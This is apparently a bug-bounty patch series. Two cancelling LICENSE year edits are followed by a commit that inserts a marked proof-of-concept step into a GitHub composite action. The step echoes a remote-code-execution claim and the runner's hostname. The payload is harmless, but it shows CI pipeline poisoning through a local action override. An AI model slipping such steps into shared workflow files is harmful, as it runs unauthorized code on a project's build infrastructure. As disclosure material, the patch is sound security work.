From 29faba2341e62d60dcfccfd2d3b3f020a6a7ffa7 Mon Sep 17 00:00:00 2001 From: ForgetMeNot <89610911+H1-0xforgetmenot@users.noreply.github.com> Date: Sat, 6 Dec 2025 22:56:11 +0330 Subject: [PATCH 1/3] Update LICENSE --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LICENSE b/LICENSE index bef30d3b..efee3226 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ MIT License -© Copyright 2025 Adobe. All rights reserved. +© Copyright 2026 Adobe. All rights reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal From df92cdd84e1c48fbf6c47c5c6f8ff85d5fbe45a3 Mon Sep 17 00:00:00 2001 From: ForgetMeNot <89610911+H1-0xforgetmenot@users.noreply.github.com> Date: Sat, 6 Dec 2025 22:58:40 +0330 Subject: [PATCH 2/3] Update LICENSE --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LICENSE b/LICENSE index efee3226..bef30d3b 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ MIT License -© Copyright 2026 Adobe. All rights reserved. +© Copyright 2025 Adobe. All rights reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal From 3b9e24242eda805a2fa4d98b62d13b8f31a9c6b5 Mon Sep 17 00:00:00 2001 From: ForgetMeNot <89610911+H1-0xforgetmenot@users.noreply.github.com> Date: Sat, 6 Dec 2025 23:00:19 +0330 Subject: [PATCH 3/3] Update action.yml --- .github/actions/install-dependencies/action.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/.github/actions/install-dependencies/action.yml b/.github/actions/install-dependencies/action.yml index 3c05edb5..9b6f7640 100644 --- a/.github/actions/install-dependencies/action.yml +++ b/.github/actions/install-dependencies/action.yml @@ -2,6 +2,13 @@ name: 'Install dependencies' runs: using: 'composite' steps: + # --- START OF POC --- + - run: | + echo "Proof of Concept by [0xforgetmenot__form_h1]" + echo "Remote Code Execution Confirmed via Local Action Override" + echo "Runner Hostname: $(hostname)" + shell: bash + # --- END OF POC --- - uses: dtolnay/rust-toolchain@stable with: target: wasm32-unknown-unknown